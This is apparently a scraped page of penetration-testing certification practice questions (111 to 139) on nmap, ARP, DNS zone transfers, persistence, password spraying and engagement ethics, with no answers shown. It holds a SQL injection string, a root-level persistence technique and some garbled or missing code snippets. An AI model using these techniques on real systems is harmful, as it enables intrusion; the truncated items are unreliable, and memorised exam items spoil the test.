Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

A.

tcpdump -i eth01 arp and arp[6:2] == 2

B.

arp -s 192.168.1.63 60-36-DD-A6-C5-33

C.

ipconfig /all findstr /v 00-00-00 | findstr Physical

D.

route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Full Access
Question # 111

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?

A.

nmap -iL results 192.168.0.10-100

B.

nmap 192.168.0.10-100 -O > results

C.

nmap -A 192.168.0.10-100 -oX results

D.

nmap 192.168.0.10-100 | grep "results"

Full Access
Question # 112

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A.

Gain access to the target host and implant malware specially crafted for this purpose.

B.

Exploit the local DNS server and add/update the zone records with a spoofed A record.

C.

Use the Scapy utility to overwrite name resolution fields in the DNS query response.

D.

Proxy HTTP connections from the target host to that of the spoofed host.

Full Access
Question # 113

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

A.

After detection of a breach

B.

After a merger or an acquisition

C.

When an organization updates its network firewall configurations

D.

When most of the vulnerabilities have been remediated

Full Access
Question # 114

Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?

A.

Scope details

B.

Findings

C.

Methodology

D.

Statement of work

Full Access
Question # 115

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

A.

To trick the systems administrator into installing a rootkit

B.

To close down a reverse shell

C.

To remove a web shell after the penetration test

D.

To delete credentials the tester created

Full Access
Question # 116

A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

A.

Dumpster diving

B.

Phishing

C.

Shoulder surfing

D.

Tailgating

Full Access
Question # 117

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

A.

Continue the assessment and mark the finding as critical.

B.

Attempting to remediate the issue temporally.

C.

Notify the primary contact immediately.

D.

Shutting down the web server until the assessment is finished

Full Access
Question # 118

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

A.

Add a web shell to the root of the website.

B.

Upgrade the reverse shell to a true TTY terminal.

C.

Add a new user with ID 0 to the /etc/passwd file.

D.

Change the password of the root user and revert after the test.

Full Access
Question # 119

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

A.

Spawn a local shell.

B.

Disable NIC.

C.

List processes.

D.

Change the MAC address

Full Access
Question # 120

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

A.

Prohibiting exploitation in the production environment

B.

Requiring all testers to review the scoping document carefully

C.

Never assessing the production networks

D.

Prohibiting testers from joining the team during the assessment

Full Access
Question # 121

Given the following script:

while True:

print ("Hello World")

Which of the following describes True?

A.

A while loop

B.

A conditional

C.

A Boolean operator

D.

An arithmetic operator

Full Access
Question # 122

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x’ OR role LIKE '%admin%

Which of the following should be recommended to remediate this vulnerability?

A.

Multifactor authentication

B.

Encrypted communications

C.

Secure software development life cycle

D.

Parameterized queries

Full Access
Question # 123

Which of the following tools would be best suited to perform a cloud security assessment?

A.

OpenVAS

B.

Scout Suite

C.

Nmap

D.

ZAP

E.

Nessus

Full Access
Question # 124

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A.

Exploit-DB

B.

Metasploit

C.

Shodan

D.

Retina

Full Access
Question # 125

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 126

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

A.

The web server is using a WAF.

B.

The web server is behind a load balancer.

C.

The web server is redirecting the requests.

D.

The local antivirus on the web server Is rejecting the connection.

Full Access
Question # 127

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

A.

Check the scoping document to determine if exfiltration is within scope.

B.

Stop the penetration test.

C.

Escalate the issue.

D.

Include the discovery and interaction in the daily report.

Full Access
Question # 128

Which of the following OSSTM testing methodologies should be used to test under the worst conditions?

A.

Tandem

B.

Reversal

C.

Semi-authorized

D.

Known environment

Full Access
Question # 129

Which of the following is a rules engine for managing public cloud accounts and resources?

A.

Cloud Custodian

B.

Cloud Brute

C.

Pacu

D.

Scout Suite

Full Access
Question # 130

A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?

A.

..nmap -sU -sV -T4 -F target.company.com

B.

..nmap -sS -sV -F target.company.com

C.

..nmap -sT -v -T5 target.company.com

D.

..nmap -sX -sC target.company.com

Full Access
Question # 131

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A.

Vulnerability scanning

B.

Network segmentation

C.

System hardening

D.

Intrusion detection

Full Access
Question # 132

A penetration tester runs the following command:

l.comptia.local axfr comptia.local

which of the following types of information would be provided?

A.

The DNSSEC certificate and CA

B.

The DHCP scopes and ranges used on the network

C.

The hostnames and IP addresses of internal systems

D.

The OS and version of the DNS server

Full Access
Question # 133

During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

A.

Linux

B.

NetBSD

C.

Windows

D.

macOS

Full Access
Question # 134

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

A.

SOW.

B.

SLA.

C.

ROE.

D.

NDA

Full Access
Question # 135

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

........v -sV -p- 10.10.10.23-28

....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?

A.

-su

B.

-pn

C.

-sn

D.

-ss

Full Access
Question # 136

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

A.

DirBuster

B.

CeWL

C.

w3af

D.

Patator

Full Access
Question # 137

During enumeration, a red team discovered that an external web server was frequented by employees. After compromising the server, which of the following attacks would best support ------------company systems?

A.

Aside-channel attack

B.

A command injection attack

C.

A watering-hole attack

D.

A cross-site scripting attack

Full Access
Question # 138

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Full Access
Question # 139

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A.

Mask

B.

Rainbow

C.

Dictionary

D.

Password spraying

Full Access